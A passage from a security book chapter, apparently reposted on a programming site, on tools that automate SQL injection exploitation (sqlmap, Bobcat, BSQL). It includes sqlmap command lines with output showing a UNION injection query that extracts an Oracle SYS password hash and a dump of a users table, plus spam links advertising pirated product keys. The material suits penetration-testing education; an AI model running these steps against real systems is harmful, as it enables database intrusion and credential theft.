Exploiting SQL Injection : Automating SQL Injection Exploitation

- Free product key for windows 10
- Free Product Key for Microsoft office 365
- Malwarebytes Premium 3.7.1 Serial Keys (LifeTime) 2019
In the previous sections, you saw a number of different attacks and techniques that you can use once you have found a vulnerable application. However, you might have noticed that most of these attacks require a large number of requests to extract a decent amount of information from the remote database. Depending on the situation, you might require dozens of requests to properly fingerprint the remote DBMS, and maybe hundreds (or even thousands) to retrieve all the data you are interested in. Manually crafting such a vast number of requests would be extremely tedious, but fear not: Several tools can automate the whole process, allowing you to relax while watching the tables being populated on your screen.


Sqlmap is an open source command-line automatic SQL injection tool that was released under the terms of the GNU GPLv2 license by Bernardo Damele A. G. and Daniele Bellucci and can be downloaded at

Sqlmap is not only an exploitation tool, but can also assist you in finding vulnerable injection points. Once it detects one or more SQL injections on the target host, you can choose among a variety of options:

  • Perform an extensive back-end DBMS fingerprint.

  • Retrieve the DBMS session user and database.

  • Enumerate users, password hashes, privileges, and databases.

  • Dump the entire DBMS table/columns or the user's specific DBMS table/columns.

  • Run custom SQL statements.

  • Read arbitrary files, and more.

Sqlmap is developed in Python, which makes the tool independent of the underlying operating system as it only requires the Python interpreter version equal to or later than 2.4. To make things even easier, many GNU/Linux distributions come out of the box with the Python interpreter package installed, and Windows, UNIX, and Mac OS X provide it, or it is freely available. Sqlmap is a command-line tool, although at the time of this writing a graphical interface is reported to be in development. Sqlmap implements three techniques to exploit an SQL injection vulnerability:

  • UNION query SQL injection, both when the application returns all rows in a single response and when it returns only one row at a time.

  • Stacked query support.

  • Inferential SQL injection. For each HTTP response, by making a comparison based on HTML page content hashes, or string matches, with the original request, the tool determines the output value of the statement character by character. The bisection algorithm implemented in sqlmap to perform this technique can fetch each output character with, at most, seven HTTP requests. This is sqlmap's default SQL injection technique.

Sqlmap is a very powerful and flexible tool, and currently supports the following databases:

  • MySQL

  • Oracle

  • PostgreSQL

  • Microsoft SQL Server

As its input, sqlmap accepts a single target URL, a list of targets from the log files of Burp or WebScarab, or a “Google dork” which queries the Google search engine and parses its results page. Sqlmap can automatically test all the provided GET/POST parameters, the HTTP cookies, and the HTTP User-Agent header values; alternatively, you can override this behavior and specify the parameters that need to be tested. Sqlmap also supports multithreading to speed up blind SQL injection algorithms (multithreading); it estimates the time needed to complete an attack depending on the speed of performed requests, and allows you to save the current session and retrieve it later. It also integrates with other security-related open source projects, such as Metasploit and w3af.

Sqlmap Example

In the first example, we will retrieve the hash of the SYS user password on an Oracle XE target, by exploiting a UNION query SQL injection vulnerability. We provide the necessary parameters through the command line, but sqlmap also allows the user to specify the same options through a configuration file. Once launched, sqlmap informs the user of the actions that are being performed and of their result. In this example, sqlmap first tests the id parameter, trying several attack vectors and checking the right number of parentheses that are needed to inject successful code. Once the injection vector has been successfully constructed, sqlmap fingerprints the database, detecting an Oracle installation. Sqlmap also attempts to fingerprint the remote operating system and Web application technology, before finally focusing on the hash of the SYS password and returning it to the user.

$ python -u “” --union-use
   --passwords -U SYS
[hh:mm:50] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:51] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:51] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:51] [INFO] GET parameter 'id' is dynamic
[hh:mm:51] [INFO] testing sql injection on GET parameter 'id' with 0
[hh:mm:51] [INFO] testing unescaped numeric injection on GET parameter 'id'
[hh:mm:51] [INFO] GET parameter 'id' is unescaped numeric injectable with 0
[hh:mm:51] [INFO] the injectable parameter requires 0 parenthesis
[hh:mm:51] [INFO] testing MySQL
[hh:mm:51] [INFO] testing Oracle
[hh:mm:51] [INFO] the back-end DBMS is Oracle
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
[hh:mm:51] [INFO] fetching database users password hashes
[hh:mm:51] [INFO] query: UNION ALL SELECT NULL,
CHR(86)||CHR(113)||CHR(70)||CHR(101)||CHR(81)||CHR(77)||NVL(CAST(NAME AS
CHR(32))||CHR(103)||CHR(115)||CHR(83)||CHR(69)||CHR(107)||CHR(112), NULL
FROM SYS.USER$ WHERE NAME = CHR(83)||CHR(89)||CHR(83)-- AND 7695=7695
[hh:mm:51] [INFO] performed 3 queries in 0 seconds
database management system users password hashes:
[*] SYS [1]:
password hash: 2D5A0C491B634F1B


Before moving on to another tool, here is another quick example, where sqlmap is used to dump the users table on the current database on a PostgreSQL 8.3.5 target, again exploiting a UNION query SQL injection vulnerability, this time using the –v 0 option to reduce the verbosity level to a minimum:

$ python -u “” --union-use –
    dump -T users -D public -v 0
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
Database: public
Table: users
[4 entries]
| id | password    | username |
| 1  | blissett    | luther   |
| 4  | nameisnull  | NULL     |
| 2  | bunny       | fluffy   |
| 3 | ming         | wu       |


Bobcat is an automated SQL injection tool that is designed to aid a security consultant in taking full advantage of SQL injection vulnerabilities; you can download it at It was originally created to extend the capabilities of a tool by Cesar Cerrudo, called Data Thief.

Bobcat has numerous features that will aid in the compromise of a vulnerable application and help exploit the DBMS, such as listing linked servers and database schemas, dumping data, brute-forcing accounts, elevating privileges, and executing operating system commands. Bobcat can exploit SQL injection vulnerabilities in Web applications, independent of their language, but is dependent on SQL Server as the back-end database. It also requires a local installation of Microsoft SQL Server or Microsoft SQL Server Desktop Engine (MSDE).

The tool also uses the error-based method for exploiting SQL injection vulnerabilities, so if the remote DBMS is protected by sufficient egress filtering, exploitation is still possible. According to the author, the next version will include extended support for other databases and new features (such as the ability to exploit blind injections) and will also be open source. The most useful and unique feature of Bobcat is its ability to exploit the DBMS through the use of an OOB channel. Bobcat implements the “OPENROWSET” style of OOB channel as introduced by Chris Anley in 2002 (see; hence, it's a requirement for a local Microsoft SQL Server or MSDE installation.Figure 1 shows a screenshot of the tool.

Figure 1. Screenshot of Bobcat


Another very promising tool for Windows boxes is BSQL, developed by Ferruh Mavituna and available at Even though it was still in beta at the time of this writing, it performed extremely well according to the OWASP SQLiBENCH project, a benchmarking project of automatic SQL injectors that perform data extraction (, and therefore already deserves mention.

BSQL is released under the GPLv2, works on any Windows machine with .NET Framework 2 installed, and comes with an automated installer. It supports error-based injection and blind injection and offers the possibility of using an interesting alternative approach to time-based injection, where different timeouts are used depending on the value of the character to extract so that more than one bit can be extracted with each request. The technique, which the author dubbed “deep blind injection,” is described in detail in a paper that you can download from

BSQL can find SQL injection vulnerabilities and extract information from the following databases:

  • Oracle

  • SQL Server

  • MySQL

Figure 2 shows an example screenshot of an ongoing BSQL attack.

Figure 2. BSQL during an Active Session

BSQL is multithreaded and is very easy to configure, thanks to a wizard that you can start by clicking the Injection Wizard button on the main window. The wizard will ask you to enter the target URL and the parameters to include in the request, and then will perform a series of tests, looking for vulnerabilities in the parameters that have been marked for testing. If a vulnerable parameter is found, you will be informed, and the actual extraction attack will start. By clicking the Extracted Database tab, you can see the data as it is being extracted, as shown in Figure 3

Figure 3. BSQL Extracting the Tables and Columns of the Remote Database

Other Tools

You've been given a brief overview of three tools that can assist you in performing an efficient data extraction, but keep in mind that several other tools out there can do a very good job too. Among the most popular are the following:

  •   Exploiting SQL Injection : Out-of-Band Communication
  •  SQL Server 2008 R2 : Dropping Indexes, Online Indexing Operations, Indexes on Views
  •  SQL Server 2008 R2 : Managing Indexes - Managing Indexes with T-SQL, Managing Indexes with SSMS
  •  SQL Server 2005 : Advanced OLAP - Advanced Dimensions and Measures (part 3)
  •  SQL Server 2005 : Advanced OLAP - Advanced Dimensions and Measures (part 2) - Parent-Child Dimensions
  •  SQL Server 2005 : Advanced OLAP - Advanced Dimensions and Measures (part 1)
  •  Microsoft Systems Management Server 2003 : Maintaining the Database Through Microsoft SQL Server - Database Maintenance
  •  Microsoft Systems Management Server 2003 : Maintaining the Database Through Microsoft SQL Server - SQL Server Components
  •  Microsoft Visual Basic 2008 : Processing and Storing Data in SQL Server 2005 - Optimizing the LINQSQL Class
  •  ASP.NET 4 in VB 2010 : ADO.NET Fundamentals (part 6) - Disconnected Data Access
    Top 10
    Free Mobile And Desktop Apps For Accessing Restricted Websites
    MASERATI QUATTROPORTE; DIESEL : Lure of Italian limos
    TOYOTA CAMRY 2; 2.5 : Camry now more comely
    KIA SORENTO 2.2CRDi : Fuel-sipping slugger
    How To Setup, Password Protect & Encrypt Wireless Internet Connection
    Emulate And Run iPad Apps On Windows, Mac OS X & Linux With iPadian
    Backup & Restore Game Progress From Any Game With SaveGameProgress
    Generate A Facebook Timeline Cover Using A Free App
    New App for Women ‘Remix’ Offers Fashion Advice & Style Tips
    SG50 Ferrari F12berlinetta : Prancing Horse for Lion City's 50th
    - Messages forwarded by Outlook rule go nowhere
    - Create and Deploy Windows 7 Image
    - How do I check to see if my exchange 2003 is an open relay? (not using a open relay tester tool online, but on the console)
    - Creating and using an unencrypted cookie in ASP.NET
    - Directories
    - Poor Performance on Sharepoint 2010 Server
    - SBS 2008 ~ The e-mail alias already exists...
    - Public to Private IP - DNS Changes
    - Send Email from Winform application
    - How to create a .mdb file from ms sql server database.......
    programming4us programming4us